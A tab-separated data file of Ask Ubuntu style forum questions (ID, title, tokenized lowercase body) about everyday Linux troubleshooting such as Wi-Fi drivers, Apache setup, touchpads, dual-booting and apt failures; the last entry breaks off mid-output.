336688	how to configure apache2 in ubuntu 13.04	i installed apache using ubuntu software center , and now it shows the following text on the page upon entrance of localhost in the addressbar of firefox it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . now i wanted firstly to run perl and php websites for testing in the apache localhost . can someone guide me in the process .
336692	where symbols there are and what they are saying ?	i am used a command as service -- status-all oot @ frank-jai : ~ # service -- status-all [ ? ] acpi-support [ ? ] acpid [ ? ] alsa-restore [ ? ] alsa-store [ ? ] anacron [ + ] apache2 [ + ] apparmor [ ? ] apport [ ? ] avahi-cups-reload [ ? ] avahi-daemon [ ? ] binfmt-support [ ? ] bluetooth [ - ] bootlogd [ - ] brltty [ ? ] console-font [ ? ] console-setup [ ? ] cron [ ? ] cups [ ? ] cups-browsed [ ? ] dbus [ ? ] dmesg [ ? ] dns-clean [ - ] dnsmasq [ ? ] failsafe-x [ ? ] friendly-recovery [ - ] grub-common [ - ] hostapd [ ? ] hostname [ ? ] hwclock [ ? ] hwclock-save [ ? ] irqbalance [ ? ] kdm [ - ] kerneloops [ ? ] killprocs [ ? ] kmod [ ? ] lightdm [ ? ] modemmanager [ ? ] mysql [ ? ] network-interface [ ? ] network-interface-container [ ? ] network-interface-security [ ? ] network-manager [ ? ] networking [ ? ] networking.dpkg-new [ ? ] ondemand [ ? ] plymouth [ ? ] plymouth-log [ ? ] plymouth-ready [ ? ] plymouth-splash [ ? ] plymouth-stop [ ? ] plymouth-upstart-bridge [ ? ] powernap [ ? ] pppd-dns [ ? ] procps [ ? ] pulseaudio [ ? ] rc.local [ ? ] resolvconf [ ? ] rfkill-restore [ ? ] rfkill-store [ - ] rsync [ ? ] rsyslog [ + ] saned [ ? ] sendsigs [ ? ] setvtrgb [ ? ] speech-dispatcher [ - ] stop-bootlogd [ - ] stop-bootlogd-single [ - ] sudo [ ? ] udev [ ? ] udev-fallback-graphics [ ? ] udev-finish [ ? ] udevmonitor [ ? ] udevtrigger [ ? ] ufw [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ ? ] vboxautostart-service [ ? ] vboxballoonctrl-service [ ? ] vboxdrv [ ? ] vboxweb-service [ + ] vmware [ ? ] vmware-usbarbitrator [ + ] vmware-workstation-server [ ? ] whoopsie [ - ] x11-common root @ frank-jai : ~ # what 's they are exactly trying to convey from those ? , + , - ?
336693	execute script on battery switch	i would like to have a bash script to be executed when i switch to battery alimentation , is this possible ?
336697	iphone data transfer rate is very slow	i 'm using a sony vaio with 8gb of ram with a core i5 3rd generation processor . recently , i 've dual-booted windows 8 with ubuntu 13.04 . the question is : when i 'm syncing my iphone 4s with windows , i get nearly 20-25 mb/s data transfer rates , but in ubuntu i 'm only getting 5-7 mb/s of data transfer rate . please can anyone explain the correct reason for this ?
336699	rhythmbox is invisible	i tried various solutions for fixing `` no sound '' problem under the ubuntu 13.04 , which got me to an odd situation in which the music or any sound plays but the rhythmbox is neither visible at the top status bar nor anywhere on the desktop screen . though it is visible in the system monitor but is not accessible to bring out the gui of the player to operate upon . what should i do ? no , sudo apt-get install -- reinstall rhythmbox did not work . can someone suggest any other solution , rhythmbox is still invisible but the music is playing fine .
336701	ubuntu 13.04 unable to locate package ubuntu after installing ubuntu sdk	am new to ubuntu and software development but after installing the sdk via the terminal , it say `` unable to locate package ubuntu '' then `` unable to locate package sdk ''
336705	ibus 1.4.1 does n't work with opera 12	environment : ubuntu 12.04 opera 12 ibus 1.4.1 i 've installed ibus-qt and add the two lines below in /usr/bin/opera , but it makes no difference : qt_im_module=xim xmodifiers= '' @ im=ibus '' as some say that qt has been deprecated in opera , so i 've also added gtk_im_module=xim in opera , but still no difference . am i missing something or we just ca n't use ibus in opera 12 ?
336708	how do i remove thundar file browser ?	i run ubuntu 12.04 and after i removed xfce4 , the file browser did not go away . i tried sudo apt-get remove thundar with no success ... someone help me find the name of this package so i can remove it off my machine .
336709	ubuntu ( 12.04 lts ) and steelseries apex gaming keyboard	has anyone successfully gotten the macro buttons working with the steelseries apex gaming keyboard ( mx1-mx10 ) ?
336710	network disabled unbuntu 13.04	i recently installed the lastest version . unable to get network connectivity using wifi . when i click on it , is says network disabled . i did a cd /etc and tried init.d/networking start and got : since the script you are attempting to invoke has been converted ... ... ... .also use the start ( 8 ) utility . i 'm lost now . any assistance to be able to use this on a dell inspirion mini would be greatly appreciated . otherwise , i 'm back to that evil dual boot using a very slow version of windows ... yuk ! ! 1st command 0 : compal-wifi : wireless lan soft blocked : no hard blocked : no 1 : compal-bluetooth : bluetooth soft blocked : no hard blicked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 2nd command 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g [ 14e4:4315 ] ( rev 01 ) also ran sudo service networking restart . resart : unknown instance .
336712	only one sound playback at a time	for some reason reason i am only able to playback one sound at a time . this means i ca n't do a skype conversation and , for instance listen to music streamed from google play or watch a youtube video . i can listen to vlc and youtube or skype/teamspeak simultaneously . when i open gnome 's sound applet and take a look at the applications-tab i can see `` asla plug-in [ plugin-container ] '' and vlc media player as seperate entries . manipulating the alsa plugin results in the sound-output of my browser , skype or teamspeak to change . why is it that it is either skype ( or teamspeak ) or my browser that can playback sound , but not all of them at the same time ? lspci | grep -i audio output : 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 01:00.1 audio device : advanced micro devices [ amd ] nee ati cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] any help is greatly appreciated , since i have no idea how to troubleshoot this .
336718	error /init line 7 - can not install any debian based distros	i have an error while booting ubuntu from live cd/usb . since i ca n't copy and paste the console output during boot ( or well , i do n't know how to do it ) i made a video that shows the error . i really do n't know why it happens , but it occurs with any debian-based distro ( tested with ubuntu , from 10.04 to 13.04 , xubuntu , debian 6 ) . it 's the same error . also tried to disable some options from the boot menu , no luck at all . the strange thing is that i had ubuntu before , and it always worked well , then when i reformatted the pc i ca n't install it anymore . this is my hw specs : motherboard : gigabyte p55-usb3 skt lga 1156 processor : i3 530 @ 2.93ghz ram : x2 2gb ddr3 1333mhz kingston hdd : seagate sata2 1tb 7,2k if anyone knows why this is happening , i 'm happy to have my ubuntu back ! =/
336726	( ubuntu 12.04 lts ) php 5.4 offline install	i searched but didnt find solution to our problem ... we have offline ( intranet ) ubuntu 12.04 lts installation . we made local offline ubuntu 12.04 repo mirror ( updating once in a week ) and i can install all other things from there . but how to install php 5.4 ? repo mirror contains only php 5.3.x version . i 've read that there is somekind `` ondrej/ ... . '' ppa where is php 5.4 for 12.04 lts but i cant access to this location from my offline network ubuntu . how to create local mirror or download all required packages from this ppa ? is there procedure for this like apt-mirror script for mirroring repository ? thank u all , //progeja .
336729	find & purchase restricted and multiverse for server ?	i stumbled upon this solution and enabled it on , a now shuttered , ubuntu server . i did n't know that multiverse package are not completely free . as in the question to the first answer : how can a restricted/multiverse package be found ? how can those packages be purchased ?
336730	can i run ubuntu 13.04 on a benq joybook a52 ?	specs : • cpu : intel core duo t2130 1.86ghz • ram : 896mb • hdd : 100gb • graphics hardware : ati radeon xpress 200m i am new to ubuntu . do i need to take care of drivers ?
336734	pressing either the `` down arrow '' and `` end '' opens dash home	running ubuntu 12.04 with a microsoft wireless keyboard 800 . every time i press either the down arrow ↓ or the end key the dash home opens up . i 've checked my keyboard shortcuts and that does n't seem to be the issue . i tested what key-press is actually detected using the keyboard shortcut utility and ↓ results in a `` mod2 + super r '' and the end key gives a `` super l '' . before i swap out the keyboard , i figured i 'd see if anyone else has experience this before . my old logitech keyboard had no issues on the same system .
336735	qt sdk for ubuntu development creating 3 qml2puppet upon design mode	when i create a project in qt creator 2.7.1 on ubuntu 13.04 64bit the project is all fine . but when i enter the design mode on the left side menu , then there are 3 instances of qml2puppet appearing on the screen . why is this happening ? the design mode is running fine on windows 7 with just single window of qml2puppet upon entering the design mode . i have also observed this problem on ubuntu 12.10 version is there any patch or any other solution that i can apply to solve this problem ?
336737	how to view text files on launchpad raw ?	on github there is a `` raw '' view for every text file in a hosted repo . for example to view just the text of a file , i press on the `` raw '' button and get it as only text ( which is useful for easy copy-pasting or running scripts using wget without installing git/bzr on a machine ) . how can i achieve this for a file hosted on launchpad , such as this one ?
336738	how do i check what version of 'cifs-utils ' i have installed ?	i am trying to mount my buffalo nas : /etc/fstab : //192.168.2.20/movies /mnt/movies cifs rw , noexec , nosuid , password=password1 , username=buffalonas , nodev when execute the following command , i am getting the error below : crash @ crash-m17x : /sbin $ sudo mount -a mount : wrong fs type , bad option , bad superblock on //192.168.2.20/movies , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so i have read via other forums that i need to update or install cifs-utils because i currently do not have /sbin/mount.cifs file , only mount.files i have are mount.ntfs but when i execute : crash @ crash-m17x : /sbin $ sudo apt-get install cifs-utils reading package lists ... done building dependency tree reading state information ... done cifs-utils is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so how do i know if i have the latest cifs-utils ? and if i already do have the latest , how do i install the mount.cifs files ?
336744	device drivers for microsoft wireless keyboard and mouse	i use microsoft wireless mouse and keyboard combo . the middle mouse button is not working in any scrolling or single click to close tabs on the firefox browser operations . can this be fixed ? are there any special drivers for the problem or are there any patches for it ? or should i install the drivers which i installed on windows 7 using wine on the ubuntu 13.04 ? will this fix the problem ?
336747	audio and video auto of sync when streaming	when streaming my desktop to twitch.tv using avconv audio and video are out of sync . sometimes it is already out of sync when starting the stream and sometimes they just drift apart after a while . this is the script i use for streaming : # ! /bin/bash inres= '' 1920x1080 '' # input resolution outres= '' 1280x720 '' offset= '' 0,0 '' fps= '' 30 '' # target fps maxrate= '' 3000k '' bufsize= '' 3000k '' audiobitrate= '' 192k '' qual= '' medium '' # one of the many ffmpeg preset stream_key= $ ( cat ~/.twitch_key ) url= '' rtmp : //live.twitch.tv/app/ $ stream_key '' show_region= '' 0 '' avconv -v quiet -f x11grab -show_region $ show_region -s `` $ inres '' -r `` $ fps '' -i :0.0+ $ offset \ -f alsa -ac 2 -b : a `` $ audiobitrate '' -i pulse -c : v libx264 -crf 30 -preset `` $ qual '' \ -s `` $ outres '' -vol 11200 -c : a libmp3lame -ar 44100 -pix_fmt yuv420p -maxrate `` $ maxrate '' -bufsize `` $ bufsize '' \ -f flv `` $ url '' exit $ ?
336749	preparing a disk from windows for installing ubuntu ( partitioning )	i have windows 8 installed . i want to install ubuntu , therefore , i want to partition a disk using standard windows 8 utility for that . however , what file system do i have to format it to : extfat or ntfs ? or i do n't have to format it to any file system , perhaps ?
336750	installing ubuntu touch on nexus 7 ( 2013 )	i am trying to install ubuntu touch on google nexus ( 2013 ) ( code : razor ) . i follow the steps on https : //wiki.ubuntu.com/touch/install . the terminal on my ubuntu desktop shows the following : info : phablet-flash : download directory set to /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821 info : phablet-flash : download directory set to /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821 info : urllib3.connectionpool : starting new http connection ( 1 ) : cdimage.ubuntu.com info : phablet-flash : download not required info : phablet-flash : restarting device ... wait info : phablet-flash : restarting device ... wait complete warning : phablet-flash : device needs to be unlocked for the following to work info : phablet-flash : flashing system to /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821/saucy-preinstalled-system-armel+grouper.img < waiting for device > erasing 'system ' ... okay [ 0.622s ] sending 'system ' ( 66487 kb ) ... okay [ 2.090s ] writing 'system ' ... okay [ 3.262s ] finished . total time : 5.974s info : phablet-flash : flashing boot to /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821/saucy-preinstalled-boot-armhf+grouper.img sending 'boot ' ( 7142 kb ) ... okay [ 0.229s ] writing 'boot ' ... okay [ 0.276s ] finished . total time : 0.506s info : phablet-flash : flashing recovery to /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821/saucy-preinstalled-recovery-armel+grouper.img sending 'recovery ' ( 7172 kb ) ... okay [ 0.230s ] writing 'recovery ' ... okay [ 0.261s ] finished . total time : 0.492s info : phablet-flash : booting /home/ankit/downloads/phablet-flash/ubuntu-touch/20130821/saucy-preinstalled-recovery-armel+grouper.img downloading 'boot.img ' ... okay [ 0.230s ] booting ... and now , it is stuck in this booting ... forever . i can not do anything further with it . is there a way to get around of this ? i duly appreciate any help . thanks in advance . best , ankit
336763	android and pc connnectivity	i did n't get how ubuntu will connect with an android device . please can anyone explain in an easier way . i mean in layman terms .
336772	how can i install flashpulgin ?	root @ ubuntu : ~ # apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done e : unable to locate package flashplugin-installer root @ ubuntu : ~ #
336780	starting over on a new laptop	my old laptop crash and was not able to retrieve anything from hard drive . i want to install ubuntu on my new laptop . what would be the best way of going about this ? last time i had to download everything on a disk and then install ubuntu . do i need to do that again ? would a stick work as well as a disk ? i liked what i could do before and i want to get off of windows .
336789	i ca n't get a java application to work on lubuntu 13.04	i want to play ftb unleashed and i can not get it to work . i have looked around and could n't find any good help .
336790	lubuntu dual-boot on a macbook ?	is it possible to dual-boot lubuntu on a macbook ? if so how would i do it ? i have not tried as yet as i wanted to know the proper way to do such thing .
336794	ca n't adjust screen brightness control in ubuntu 12.04 ?	my laptop is lenovo g580 . i have searched for the solution . i have tried xbacklight . please help
336795	ubuntu fix dependency problems	i am having dependency problems , whenever i do an apt-get install , i get this error message : http : //pastebin.com/dfnagyk1 i already tried : apt-get clean , update , upgrade , install -f dpkg -- configure -a what should i do now ?
336806	how do i fix my wi-fi range ?	i have an acer aspire , and after i changed over to ubuntu , my wifi range is limited to about the same range i would get if i was hardwired in . i understand there is some driver compatibility issues that arise with a os change , but i was wondering if there is anyway to fix this , or if there is an updated driver for ubuntu to fix this . i understand i am running 13.10 , which is still in ubuntu , but all the help i 've seen for 13.04 seems to work , so any assistance would be greatly appreciated .
336811	installing xampp	i 'm new to linux and i 'm trying to install xampp i downloaded the file and i cant execute it , i followed the instruction on http : //www.apachefriends.org/en/xampp-linux.html # 374 but when i 'm trying the command chmod 755 chmod 755 xampp-linux-1.8.2-0-installer.run it 's showing can not access ‘xampp-linux-x64-1.8.3-0-installer.run’ : no such file or directory i 'm using 64bit ubuntu 13.04 please help me
336817	dual booting problem with windows 8 and ubutnu 12.10	am beignner to linux world . tried to dual boot ubuntu along side preinstalled windows 8 in my samsung series 5 np550pc s03in laptop . i have followed this guide - http : //askubuntu.com/questions/22183 ... uefi-supported and based on the video , i have created a swap space and ubuntu os space . i have disabled secure bootloader and booted in csm . everything went fine , ubuntu 12.10 installed fine and after restart , it doesnt booted up the ubuntu as well as windows . just a blank screen displays . after restarting ubuntu via livecd , i selected try ubuntu and installed boot-repair . but still have booting problem . here is the pastebin link from boot loader - http : //paste.ubuntu.com/6022524 also , please advice how much space should i allocate for swap ? i am going to allocate 200gb for ubuntu and hence advice the corresponding swap size .
336818	tkip encryption not visible	when i want to connecto to my ap whih uses security type = wpa2 - personal encryption = tkip there is no field i can enter tkip encryption , i am asked only for name , security type and security key i can not connect if i just enter ssid and security key . the strange thing is i made a teathering ap from my lg android phone and ubuntu connected without problem ... . the ap i am using is used by at least 6 devices in my house and every of my friends when come , they connect it with no problem so , bottom line is - can not connect ap from ubuntu , but can connect on a phone which plays a role of ap ( teathering )
336822	ubuntu touch port for nexus 7 2 ( flo )	does anyone know of a port of ubuntu available for the new google nexus 7 ( 2013 ) . it has been code-named `` flo '' while the earlier one was named `` grouper '' . all the software currently available for ubuntu or ubuntu touch is for grouper , but i did not find any such port for flo . i tried > adb shell getprop ro.product.device > flo whenever i install anything meant for grouper onto this , it gives me an assertion failure ( rightly so ) and the installation does not go through . i have checked the touch wiki , but have n't found anything for flo . is it known by some other name ? and is any work happening in this area ? i 'd really appreciate any help on this . best , ankit
336823	how to patch abiword in xubuntu	i 'm a developer migrating to linux from mac . just installed xubuntu on my new asus 1015e and i 'm seeing the scrolling bug in abiword that seems to be a pretty common problem . however , like this user : mouse scrolling bug in abiword and open office ... i 'm brand new to linux and i ca n't figure out how to patch it . here 's the link to the bug report : https : //bugs.launchpad.net/ubuntu/+source/abiword/+bug/960089 could someone please direct me to how to install the patch or downgrade to abiword 2.8.6 ? ( the software center does n't seem to offer a downgrade , and i tried installing according to these instructions : http : //abisource.com/wiki/install_on_ubuntu but still got 2.9.2 )
336824	black screen when trying to install ubuntu 12.04.2 on asus x502c	this question is yet another one about problems with blank screens when trying to install ubuntu ( 12.04.2 ) on a machine which uses uefi secure boot . in my case , installing off of a dvd in an external drive . i have already tried modifying the boot config according to the suggestions made in assorted thread ( see -- partial -- list below ) , so i 'm here to ask what can i try next ? ! i am still hoping that there 's a straightforward solution , though one post i saw ( about problems with the intel 3000 graphics card ) does appear to suggest that i might be forced to use the command line install . if that it the case , i 'd like to be confident that the problem can be fixed readily post-install . please bear in mind that i 'm new to ubuntu and linux in general . configurations tried so far , all starting off from : set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz i tried : adding nomodeset ( to the linux ... line ) adding nomodeset=1 replacing quiet splash with nomodeset=1 replacing quiet splash with nomodeset acpi=off replacing quiet splash with nomodeset apic=off acpi=off replacing quiet splash with nomodeset apic=off acpi=off drm_kms_helper.poll=0 i even tried adding set gfxmode=1366x768 just after set gfxpayload=keep with the final permutation , but no joy . ( i 'm not even sure that could work ? ) installed wubi in an attempt to sanity check the dvd , i ran the wubi install from windows . it ran through fine and completed ok , as far as i could tell . of course , i could n't boot into wubi as i was blocked by the \ubuntu\winboot\wubildr.mbr + 0xc000007b problem . so i just uninstalled it . my machine is an asus x502c with an intel i3-3217 processor and an `` integrated intel速 hd graphics 4000 '' card . the laptop was actually listed in the online catalog as an asus x501a , which appears to get the green light in ubuntu.com 's certification list , and to be commented favourable on in the forums . ( i assume that the stock of old machines ran out and they moved onto its successor . while the x502c is no doubt supposed to an improved version of the x401a , it is n't going to well for me so far ... ) i confirmed that it is using uefi secure boot ( confirm-securebootuefi returned true ) the black , new style gnu grub screen is the one that 's displayed the main threads i 've looked at so far : live dvd 's wo n't install or let me try ubuntu how to understand ubuntu uefi secure boot install ? installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) unable to install ubuntu on lenovo y500 how to set nomodeset and other kernel boot options in grub2 uefi black screen when trying to install ubuntu at the time of installing ubuntu , i am getting dark black screen only [ duplicate ] screen turns black when trying to install with a intel hd graphics 3000 plus this , which is a bit dense for me : ubuntu install usb does n't boot in uefi mode on asus k55n laptop
336828	can not install wireless driver for broadcom 12.04	i just installed wubi on a dell inspiron , and am trying to install the drivers for a broadcom bcm4312 driver . i know this is a common question on the site , but i think i have tried every solution posed , and i still can not get it to work . when i go into the jockey file , i get : 2013-08-24 17:10:10,049 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted i went into the blacklist.conf file and commented out # blacklist bcm43xx and i have restarted , even done a fresh install of wubi . nothing works . any suggestions ? let me know know what further info i need to provide . based on request for further feedback , i ran this command : lspci -- n -d 1434 : and got the response : 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) for further information , i uninstalled wubi and installed ubuntu 12.04 on a new partition of my hard drive ( i thought that might help with the driver issues ) , but i 'm having the same problem . i am able to connect an ethernet cable to get internet directly onto the machine . and , when i had wubi installed in a previous installation on the same machine , i was able to somehow get the wireless to work , so i 'm pretty sure it can be done .
336830	new login keychain created at each login	ubuntu 13.04 64 bit . auto lagin is not disabled ( i.e . i do have to enter my password to login ) . the password for the `` login '' key chain ( previously my only key chain is the same as my login password . when i login , instead of unlocking the keyring with all my passwords on it , it creates a new `` login '' keyring which is unlocked . i am then prompted for a password for my real `` login '' keyring . so i have a keyring called `` login '' for every time i 've logged in since this has started ( sans the ones i 've deleted ) , but only one ( the one that was just created ) actually gets unlocked at login .
336832	how can i mount my mac superdrive ? running 13.04 on a mac mini	i have been running 13.04 for the last few months with few issues . just had cause to use my superdrive , and i ca n't seem to get ubuntu to see it . if i try to insert a disk , the drive will not accept it . the eject button on my keyboard does work . running sudo lshw -short does list the superdrive as /0/4/0.0.0 /dev/cdrom disk superdrive . so how do i mount it ?
336834	how to make wifi ( rt3090 ) work on ubuntu raring ?	as i can see , one can solve this problem on earlier versions of ubuntu . but there is no packages for raring in ppa : markus-tisoft/rt3090 and it does n't compile from sources . also , there is no rt2860sta.ko and rt3090sta.ko in ubuntu repositories other than for lucid . have they discontinued support for this device ? i can probably use old kernel , but i 'd like to find a better solution if any .
336839	touchpad not working with toshiba satellite ubuntu 13.04	i ca n't seem to get my touchpad on a toshiba satellite laptop working . it used to work but for some reason it stopped at some point . i have no idea how long it has n't been working because i used a mouse all summer but a fresh install is really the last resort here . i 've spent a few hours searching for an answer and i 'm stumped ... and ya i already tried fn + f9 . here 's what i tried that might be helpful : xinput list displays this : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:101d id=13 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb 2.0 camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=12 [ slave keyboard ( 3 ) ] so it at least recognizes the touchpad . then i did xinput list-props 11 and that displayed this : device 'synps/2 synaptics touchpad ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 260 ) : 0 device accel constant deceleration ( 261 ) : 1.000000 device accel adaptive deceleration ( 262 ) : 1.000000 device accel velocity scaling ( 263 ) : 10.000000 device product id ( 250 ) : 2 , 7 device node ( 251 ) : `` /dev/input/event10 '' evdev axis inversion ( 264 ) : 0 , 0 evdev axis calibration ( 265 ) : < no items > evdev axes swap ( 266 ) : 0 axis labels ( 267 ) : `` abs mt position x '' ( 258 ) , `` abs mt position y '' ( 259 ) , `` abs pressure '' ( 256 ) , `` abs tool width '' ( 257 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 268 ) : `` button left '' ( 136 ) , `` button unknown '' ( 253 ) , `` button right '' ( 138 ) , `` button wheel up '' ( 139 ) , `` button wheel down '' ( 140 ) evdev middle button emulation ( 269 ) : 0 evdev middle button timeout ( 270 ) : 50 evdev third button emulation ( 271 ) : 0 evdev third button emulation timeout ( 272 ) : 1000 evdev third button emulation button ( 273 ) : 3 evdev third button emulation threshold ( 274 ) : 20 evdev wheel emulation ( 275 ) : 0 evdev wheel emulation axes ( 276 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 277 ) : 10 evdev wheel emulation timeout ( 278 ) : 200 evdev wheel emulation button ( 279 ) : 4 evdev drag lock buttons ( 280 ) : 0 if i 'm reading that correctly it says the touchpad is enabled and it still does n't work . the mouse does n't move , it does n't click and it does n't scroll . i 'm lost here , i really have no idea what to do . any help would be awesome . i 'm not very good at this so i 'm probably missing something .
336842	how to hotkey the brightness settings	i want to hotkey certain often used brightness settings under ctrl+ f7 through f10 . i can already change it with the therminal . to be able to do this i ran the following command chmod 666 /sys/class/backlight/intel_backlight/brightness after that i was able to change it with echo < value i want > > /sys/class/backlight/intel_backlight/brightness ( you might need to change `` intel_backlight '' to whatever vendor you have . ) after that worked i went to `` system settings - > keyboard - > custom shortcuts '' and added a custom shortcut with the following values name = lowest brightness command = echo 1 > /sys/class/backlight/intel_backlight/brightness and i set it run with ctrl + f7 but when i press ctrl + f7 nothing happens ( cat /sys/class/backlight/intel_backlight/brightness outputs the same value it had before pressing ctrl + f7 ) making a little script that executes these commands and setting that to a hotkey also did n't work ( executing it with a therminal did work ) how do i fix this ? ps . my grub file has one a little alteration to make the brightness function keys work . grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor dell_laptop.backlight=0 '' but i ca n't use the function keys to reach the desired values
336846	keep laptop connected to wifi when closed	is there a way to keep my laptop connected to my home wifi when i close it ? i remember being able to do this when i ran windows , but i ca n't seem to find a setting for it ? it would be helpful for longer downloads .
336849	ca n't set dns with static ip	i 'm running ubuntu 13.04 . i uninstalled dhcp . i set my ip address to 192.168.1.200 and it 's working just fine . i can connect to it via my other internet network machines . however , i 've tried to set dns in /etc/network/interfaces to : dns-nameservers 8.8.8.8 8.8.4.4 and that does n't work . i tried the prepend before it also . i tried the resolve.conf and resolve.conf.d/head and tail with nameserver 8.8.8.8 and that does n't work . i restart each of the services each time i edit them and try to resolve an address and i get the typical unknown host www.google.com . i 've restarted the vm too ( it 's set to bridged in virtualbox ) . i ca n't re-install dhcp from repositories because dns is n't working . can someone please help me ? i 'm getting pretty frustrated . i 've tried every solution i can find on google .
336852	how can i serve files via apache2 from an internal ntfs partition using fstab ntfs-3g ?	i have apache2 setup and serving files successfully from locations such as : /var/www/example.com where ownership and permissions were set like this : sudo chown -r $ user : $ user /var/www/example.com sudo chmod -r 755 /var/www resulting permissions look like : drwxr-xr-x 6 tim tim 4096 aug 23 23:22 example.com/ drwxr-xr-x 5 tim tim 4096 aug 24 14:45 www/ and apache2.conf includes : servername 127.0.0.1 and hosts includes 127.0.0.1 localhost sudo service apache2 restart a browser successfully loads : localhost/example.com the above is all good but ... i get 403s when i attempt to setup files to be served from an ntfs partition with : sudo gedit /etc/fstab /dev/sda3 /media/tim/data ntfs-3g permissions , locale=en_gb.utf8 0 2 sudo umount /media/tim/data sudo mount -a and use the same chown and chmod method above : sudo chown -r $ user : $ user /media/tim/data/www/example.com sudo chmod -r 755 /media/tim/data/www with a symbolic link such as : /var/www/ $ ln -s /media/tim/data/www/example.com the symbolic link works with these permissions : lrwxrwxrwx 1 tim tim 36 aug 24 14:45 example.com - > /media/tim/data/www/example.com and the permissions for the folders look like this : drwxr-xr-x 1 tim tim 8192 aug 24 15:16 /media/tim/data/www/example.com drwxr-xr-x 1 tim tim 0 aug 23 23:24 /media/tim/data/www/ i have also tried setting up virtualhost successfully on the local ext4 file system , but again got 403s if the virtualhost pointed to /media/tim/data/www/example.com or the symbolic link /var/www/example.com i 've seen others apparently solve the issue with the fstab method , and as far as i can tell my permissions are also set correctly this way , but still fails . answers appreciated .
336853	how to install using the apt : // url on ?	i ran into this website : https : //apps.ubuntu.com/cat/applications/synaptic/ and on it there is a link to be opened with the ubuntu app center , but firefox does n't know what to do with it . what i got to do to get it opened as it should ?
336870	i can not use apt-get update	i have ubuntu 13.04 server on a virtual box which is using 2gb of ram and 20gb of space . it 's freshly installed and i can not use apt-get update . i have tried the same on an ubuntu 12.10 server but it still does n't work . every time i type apt-get update i get 0 % [ connecting to ca.archive.ubuntu.com ( 91.189.92.202 ) ] [ connecting to security.ubuntu.com ( 91.189.91.15 ) ] which then hangs for about 20 minutes , and then this displays err http : //security.ubuntu.com raring-security release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] err http : //ca.archive.ubuntu.com raring release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] err http : //ca.archive.ubuntu.com raring-updates release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] err http : //ca.archive.ubuntu.com raring-backports release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] reading package lists ... done w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/raring/release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/raring-updates/release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/raring-backports/release.gpg can not initiate the connection to ca.archive.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1360:8c01 : :1a ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1a 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . however i can ping the ip address and domain on the server , and i can access it on my host machine browser davidrockin @ ubuntu : /etc/apt $ ping -c 2 ca.archive.ubuntu.com ping ca.archive.ubuntu.com ( 91.189.91.13 ) 56 ( 84 ) bytes 